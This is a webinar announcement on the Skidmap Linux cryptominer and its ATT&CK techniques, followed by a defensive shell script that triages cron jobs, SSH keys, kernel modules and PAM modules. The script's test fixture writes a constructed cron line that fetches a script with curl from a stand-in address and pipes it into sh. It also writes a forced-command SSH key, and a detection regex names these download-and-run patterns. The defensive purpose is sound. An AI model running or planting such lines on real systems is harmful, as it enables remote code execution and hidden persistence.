In this “Anatomy of a Hack” episode, we turn to the Linux world and dissect Skidmap malware. Skidmap is technically a cryptominer, but it’s very valuable as an example of typical Linux attack methods that any attacker could use, including:
- Cron jobs
- Pluggable authentication modules
- Kernel modules
- Secure shell keys
- Scripts
In this real-training-for-free event, we will show you how Skidmap works and explore its behavior and the details of its various elements. We will map elements of Skidmap to 8 different MITRE ATT&CK techniques across 5 tactics:
| TID | Tactic | Technique |
|---|---|---|
| T1168 | Persistence, Execution | Local Job Scheduling |
| T1215 | Persistence | Kernel Modules and Extensions |
| T1045 | Defense Evasion | Software Packing |
| T1089 | Defense Evasion | Disabling Security Tools |
| T1036 | Defense Evasion | Masquerading |
| T1014 | Defense Evasion | Rootkit |
| T1071 | Command And Control | Standard Application Layer Protocol |
| T1496 | Impact | Resource Hijacking |
As you can see, Skidmap employs 4 different techniques to evade detection. In particular, it's interesting how Skidmap hides the high CPU usage that cryptomining causes. We will use the osquery engine integrated into VMware Carbon Black Audit & Remediation to look for artifacts like those left by Skidmap.
This will be a very technical and interesting session with insights from VMware Carbon Black's Threat Analysis Unit (TAU). VMware Carbon Black is our sponsor, and Staff Solution Engineer Jon Nelson will briefly show you how, with VMware Carbon Black Enterprise EDR, you can detect the techniques Skidmap uses to disable system protections and hide its network traffic. Jon will also demonstrate how you can use similar techniques to discover webshells with VMware Carbon Black Enterprise EDR.
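As an added example that is not part of the webinar, the TAU material or any VMware Carbon Black query: a POSIX shell triage script that checks a Linux host for the artifact classes listed at the top of this page (cron jobs, SSH authorized keys, loaded kernel modules, PAM modules). Every path is taken relative to a ROOT argument so it can run against a live host (`/`), a mounted image, or the constructed fixture built by `make_fixture`. The cron regex, the allow-list format (one module name per line) and the PAM baseline format (`sha256  /path` lines) are this script's own conventions; the fixture contents (addresses, key comments, module and file names) are constructed and are not real Skidmap indicators.

```shell
#!/bin/sh
# Linux persistence-artifact triage. Added example; not from the webinar,
# TAU or VMware Carbon Black. Needs grep, awk, sed, sha256sum, mktemp.
# ROOT defaults to "/" so the same checks run on a host or an offline image.

# Cron lines that pull code from the network, pipe into a shell, or run from
# world-writable directories. Comments and blank lines are skipped.
suspicious_cron() {
  root="${1:-/}"; root="${root%/}"
  for f in "$root"/etc/crontab "$root"/etc/cron.d/* \
           "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
    [ -f "$f" ] || continue
    grep -Ev '^[[:space:]]*(#|$)' "$f" \
      | grep -E 'curl|wget|\|[[:space:]]*(ba)?sh([[:space:]]|$)|/tmp/|/var/tmp/|/dev/shm/|base64' \
      | sed "s|^|CRON $f: |" || true
  done
}

# Every authorized_keys entry with its key type, comment and any leading
# options field (command=, from=, ...), so an added key stands out against the
# keys the team expects. Multi-word comments or options are not parsed.
list_ssh_keys() {
  root="${1:-/}"; root="${root%/}"
  for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
    [ -f "$f" ] || continue
    grep -Ev '^[[:space:]]*(#|$)' "$f" | awk -v f="$f" '{
      i = ($1 ~ /^(ssh-|ecdsa-|sk-)/) ? 1 : 2   # field that holds the key type
      opts = (i == 2) ? $1 : "-"
      comment = (NF > i + 1) ? $(i + 2) : "-"
      printf "SSHKEY %s: type=%s comment=%s options=%s\n", f, $i, comment, opts
    }' || true
  done
}

# Loaded kernel modules (from /proc/modules) not on an allow-list of one name
# per line, e.g. captured from a known-good host of the same build.
unexpected_modules() {
  root="${1:-/}"; root="${root%/}"; allow="${2:?allow-list file required}"
  [ -f "$root/proc/modules" ] || return 0
  awk '{print $1}' "$root/proc/modules" | sort -u | while read -r m; do
    grep -qxF "$m" "$allow" || echo "MODULE $m: not in allow-list"
  done
}

# PAM modules whose SHA-256 is absent from a baseline of "sha256  /path" lines.
# A replaced pam_unix.so and a newly dropped module both show up here.
pam_drift() {
  root="${1:-/}"; root="${root%/}"; baseline="${2:?baseline file required}"
  for d in "$root"/lib/security "$root"/lib64/security "$root"/usr/lib/security \
           "$root"/usr/lib64/security "$root"/usr/lib/x86_64-linux-gnu/security; do
    [ -d "$d" ] || continue
    for so in "$d"/pam_*.so; do
      [ -f "$so" ] || continue
      sum=$(sha256sum "$so" | cut -d' ' -f1)
      rel="${so#"$root"}"
      grep -qxF "$sum  $rel" "$baseline" || echo "PAM $rel: hash $sum not in baseline"
    done
  done
}

# Constructed fixture: none of these files, names or addresses are real Skidmap
# artifacts; they exist only so the checks above can run offline.
make_fixture() {
  fx=$(mktemp -d)
  mkdir -p "$fx/etc/cron.d" "$fx/root/.ssh" "$fx/proc" "$fx/lib/security"
  printf '*/5 * * * * root /usr/bin/updatedb\n' > "$fx/etc/cron.d/locate"
  printf '# constructed downloader job\n*/10 * * * * root curl -fsSL http://198.51.100.7/x.sh | sh\n' \
    > "$fx/etc/cron.d/x"
  printf 'ssh-ed25519 AAAAC3Nza admin@bastion\ncommand="/tmp/.x/run" ssh-rsa AAAAB3Nza\n' \
    > "$fx/root/.ssh/authorized_keys"
  printf 'ext4 12345 1 - Live 0x0\nunexpected_mod 4096 0 - Live 0x0\n' > "$fx/proc/modules"
  printf 'ext4\n' > "$fx/allow.txt"
  printf 'placeholder pam_unix\n' > "$fx/lib/security/pam_unix.so"
  printf 'placeholder pam_hook\n' > "$fx/lib/security/pam_hook.so"
  printf '%s  /lib/security/pam_unix.so\n' \
    "$(sha256sum "$fx/lib/security/pam_unix.so" | cut -d' ' -f1)" > "$fx/pam_baseline.txt"
  echo "$fx"
}

# Run all four checks against the fixture: ./triage.sh --demo
demo() {
  fx=$(make_fixture)
  suspicious_cron "$fx"
  list_ssh_keys "$fx"
  unexpected_modules "$fx" "$fx/allow.txt"
  pam_drift "$fx" "$fx/pam_baseline.txt"
  rm -rf "$fx"
}
if [ "${1:-}" = "--demo" ]; then demo; fi
```

On the fixture the script reports exactly one cron line (the downloader piped into `sh`), both SSH keys with the forced-command key's options field visible, the module missing from the allow-list, and the PAM module missing from the baseline, while the baselined `pam_unix.so` stays quiet. On a real host the allow-list and baseline have to come from a trusted build of the same distribution, and a rootkit that filters `/proc/modules` or directory listings will hide from this kind of userland check; that is the point of pairing it with kernel-aware telemetry.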
Please join us for this real training for free session.